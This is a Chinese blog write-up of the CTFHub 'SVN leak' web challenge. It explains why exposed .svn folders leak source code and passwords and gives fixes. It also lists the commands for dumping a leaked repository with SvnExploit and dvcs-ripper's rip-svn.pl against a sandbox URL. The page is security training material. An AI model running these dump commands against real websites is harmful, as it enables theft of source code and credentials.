CTFHub技能树-信息泄露-SVN泄漏

于 2024-09-08 09:55:07 发布
阅读量815 收藏 15
点赞数 14
分类专栏: CTFHUB 文章标签: svn ctfhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74313947/article/details/142016370
版权

目录

Git与SVN的区别

漏洞产生的原因

漏洞危害

修复建议

工具下载

解题过程

当开发人员使用 SVN 进行版本控制,对站点自动部署。如果配置不当,可能会将.svn文件夹直接部署到线上环境。这就引起了 SVN 泄露漏洞。

Git与SVN的区别

  • Git 是分布式版本控制系统,每个开发者都拥有完整的代码库副本。这意味着即使没有中央服务器,你也可以在本地进行大部分操作,如提交、查看历史记录等。当有网络连接时,可以与其他开发者进行同步。
  • SVN 是集中式版本控制系统,代码存储在中央服务器上。开发者需要连接到中央服务器才能进行大部分操作。如果中央服务器出现问题,可能会影响整个团队的开发工作。

漏洞产生的原因

在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,黑客可以借助其中包含的用于版本信息追踪的entries文件,获取站点信息。

漏洞危害

攻击者可以利用.svn/entries文件,获取到应用程序源代码、svn服务器账号密码等信息。同时,SVN产生的.svn目录下还包含了以.svn-base结尾的源代码文件副本(低版本SVN具体路径为text-base目录,高版本SVN为pristine目录),如果服务器没有对此类后缀做解析,黑客则可以直接获得文件源代码。

  1. 攻击者利用该漏洞可下载网站源代码,获得数据库的连接账号密码等敏感信息;
  2. 攻击者可通过获取的源代码进一步分析出新的系统漏洞,从而进一步入侵系统;

修复建议

  • 查找服务器上所有.svn隐藏文件夹,删除。
  • 开发人员在使用SVN时,严格使用导出功能,禁止直接复制代码。

工具下载

SvnExploit下载

GitHub - admintony/svnExploit: SvnExploit支持SVN源代码泄露全版本Dump源码

dvcs-ripper下载

GitHub - kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG...

dvcs-ripper需要在kali上下载运行,并安装Perl环境

sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl

解题过程

首先还是先使用dirsearch进行扫描,发现有.svn泄漏

使用svnexploit工具下载.svn

python3 SvnExploit.py -u http://challenge-9005d52ddc930d30.sandbox.ctfhub.com:10800/.svn/ --dump

 

但是svnexploit这个工具只能获取当前版本的源代码,而题目提示说flag在旧版本

所有我们要得到旧版本的源码

使用.使用 dvcs-ripper 工具中的 rip-svn.pl 脚本进行下载

./rip-svn.pl -v -u http://challenge-9005d52ddc930d30.sandbox.ctfhub.com:10800/.svn

使用ls -a查看隐藏文件

匹配二进制源码

cat wc.db|grep -a flag

最后找到flag

爱吃红薯拔丝的小鹿
关注
专栏目录
ctfhub web 信息泄露 SVN泄露
cuddlylm的博客
06-11 453
SVN是源代码本本管理软件。使用SVN管理本地代码过程中,会生成一个名为.svn的隐藏文件夹,其中包含重要的源码信息。网站管理员在发布代码时,没有使用导出功能,直接进行复制粘贴。 漏洞例子:xxxx/.svn/entries 扫描一下看看 出现了svn泄露的标志 安装:sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl 安装工具gitclone: g
ctfhub技能树_web_信息泄露
YanLucyqi的博客
11-28 1457
(5)输入su root切入root用户,然后再输入perl -MCPAN -e shell,在shell中输入yes、install DBD::SQLite和exit,再输入./rip-svn.pl -v -u http://challenge-cc015ed48792bae4.sandbox.ctfhub.com:10800/.svn/恢复原先版本。(2)打开https://gitcode.net/mirrors/BugScanTeam/GitHack?
CTFHub:web前置技能-信息泄露-SVN泄露
最新发布
wdnmddbl的博客
06-07 1102
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:dvcs-ripper下载点我链接:svnExploit下载点我大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:文章很详细。
SVN泄露ctfhub
2401_82985722的博客
04-15 1571
SVN详解_svn cp-CSDN博客subvert(颠覆) + verson(版本) = subversion --> svnSVN(Subversion)是一种开放源代码版本控制系统,用于管理项目的文件和代码。
ctfhub--svn泄露
ljj20020718的博客
11-17 577
ctfhubsvn泄露
CTFHUb--SVN泄露
m0_73605862的博客
07-23 505
然后进入这个.svn文件,一直进入直到看到pristine文件(存放旧服务器源代码的文件)然后尝试进入文件 ,结果第一个就是flag。首先到dvcs-ripper目录下进行使用rip-svn.pl,然后输入。1.因为要找到旧版本的源代码,则是找到pristine文件。查看该目录下的所有文件,可以看到一个后缀为.svn的隐藏文件。
CTFHUB-WEB-信息泄露
K_ShenH的博客
06-12 696
CTFHub-Web-信息泄露
2021-09-08 ctfhub-web-信息泄露
Ygsqddm的博客
09-09 215
这里写目录标题信息泄露备份文件下载网站源码bak文件vim缓存 信息泄露 备份文件下载 网站源码 编写python脚本:参考 url = "http://challenge-df5974f46b672686.sandbox.ctfhub.com:10800/" file = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp'] houz = ['zip', 'tar.gz', 'rar', 'tar'] for i in file:
CTFHUB-WEB-信息泄露+密码口令【02】 dirsearch 、Githack使用
(∪.∪ )...zzz的博客
06-08 905
目录遍历 phpinfo 备份文件下载 网站源码
CTFHUBWeb技能树——信息泄露writeup
生活·代码_这里是青_分享快乐
04-12 6853
CTFHUB writeup,web技能树信息泄露,目录遍历、PHPINFO、备份文件下载、网站源码、bak文件、Vim缓存、.DS_Store、Git泄露、Log、Stash、Index;路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过操纵带有“点-斜线”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。需要注意的是,系统操作访问控制
ctfhub-svn泄漏,HG泄漏,XSS反射性,文件上传--无验证
weixin_55702959的博客
02-01 2140
目录 CTFHUB-SVN泄漏 HG泄露 XSS反射型 文件上传 --无验证 CTFHUB-SVN泄漏 SVN(subversion)是程序员常用的源代码版本管理软件。一旦出现SVN泄漏黑客可获取网站源代码,一方面是掠夺了网站的技术知识资产,另一方面,黑客还可通过源代码分析其它安全漏洞,从而对网站服务器及用户数据造成持续威胁 -----------------------------------------------------------------------------------..
CTFHub | SVN泄露
尼泊罗河伯的博客
10-13 5711
此题使用 kali-linux 系统完成,因为使用 windows 系统环境使用 Perl 配置环境变量过于繁琐,且 Perl 更适合在 Linux 环境中使用。在做这题碰到的坑还挺多,一开始尝试了使用各种 SVN 泄露漏洞利用工具,最后发现 dvcs-ripper 这个工具比较好用。配置好工具及环境后,使用工具将泄露文件 clone 到本地目录下,最后通过检索文件发现 6e 文件中的文件存放此题 flag 。
ctfhubsvn泄露
weixin_50683638的博客
11-24 1929
WP ——svn 题目如下: dirsearch-master>python dirsearch.py -u URL -e *看到svn目录右击鼠标可暂停扫描 在kali中用dvcs-ripper扫描./rip-svn.pl -v -u URL.svn/ 因为svn是隐藏文件,所以ls -a查看文件
ctfhubsvn信息泄露
tempulcc的博客
10-08 5473
ctfhubsvn信息泄露1、漏洞形成原理1)什么是SVN?2)漏洞成因3)漏洞修复2、ctf实战1)配置工具环境2)恢复.svn3)进入.svn目录,查找flag 1、漏洞形成原理 1)什么是SVN? SVN是subversion的缩写,是一个开放源代码的版本控制系统,通过采用分支管理系统的高效管理,简而言之就是用于多个人共同开发同一个项目,实现共享资源,实现最终集中式的管理。 2)漏洞成因 在服务器上布署代码时。如果是使用 svn checkout 功能来更新代码,而没有配置好目录访问权限,则会存在此
CTF-SVN泄露
diven2的博客
08-03 386
CTF-SVN泄露 首先是环境搭建DVCS-ripper需要在perl环境中才能运行,因为他是使用perl语言编写的。就像.py文件必须在python环境中运行一样。perl是一种面向对象的服务器语言就和C语言一样都是高级语言。 然后是kali中perl环境安装的代码在命令行中输入 sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl
CTFHub SVN泄露
feng的博客
10-03 1394
用dirsearch扫一下目录,发现了/.svn/wc.db文件的存在,说明存在SVN泄露。使用dvcs-ripper的rip-svn.pl进行处理。我是在kali里进行的,我发现在windows上的话会有玄学问题。弄了很久还是不行,但是又苦于切换系统太麻烦,最后直接装了虚拟机。生产力果然提高了很多。 就是直接在github上下载dvcs-ripper,然后进入dvcs-ripper-master文件夹里使用命令就可以了。 然后开始使用: 再tree看看: 需要注意的是,.svn是隐藏文件,在linux
ctfhub web git泄露 svn泄露 hg泄露
mrwangtw的博客
09-03 925
目录 log(当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的GitHack完成本题) Stash(当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的GitHack完成本题) Index(当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当
CTFHUBSVN泄露和HG泄露
m0_56988395的博客
03-03 5668
目录 1、SVN泄露 2、HG泄露 1、SVN泄露 其实我们应该先用dirsearch先扫的,这才是一个完整的流程,但是我们这里直接根据提示来,这里利用一款的perl版本控制软件信息泄露利用工具,叫dvcs-ripper,支持SVN, GIT, Mercurial/hg, bz等等,工具直接上github上搜,基本都是有的。 这里提示是svn泄露,所以我们使用rip-svn.pl模块 perl ./rip-svn.pl -v -u http://challenge-609b.
Seay-Svn:扫描SVN源代码泄露漏洞工具详解
资源摘要信息:"Seay-Svn源代码泄露漏洞扫描工具" SVN(subversion)是一种流行的开源版本控制系统,广泛用于软件开发过程中,以跟踪和管理代码的变更。它能够帮助开发团队保持代码的一致性,同时允许不同的开发者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱吃红薯拔丝的小鹿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值